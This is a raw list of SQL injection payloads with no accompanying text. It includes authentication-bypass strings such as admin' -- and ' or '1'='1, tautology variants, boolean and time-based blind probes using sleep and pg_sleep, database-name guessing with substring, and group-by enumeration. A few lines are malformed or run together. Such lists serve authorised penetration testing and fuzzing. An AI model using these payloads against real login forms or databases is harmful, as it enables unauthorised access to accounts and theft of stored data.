' OORR 1<2 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or 1=1--
or true--
" or true--
' or true--
")or true--
') or true--
' or 'x'='x
) or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' order by 1 --+
' and "a"="a"--+
' and database()="securtiy"--+
' and substring(database(),1,1)="a"--+
' and sleep(2) and "a"="a"--+
' and sleep(2) and substring(database(),1,1)="a"--+
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1- information_Schema.tables;# admin'
and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7
''||(select 1 from (select pg_sleep(6))x)||'
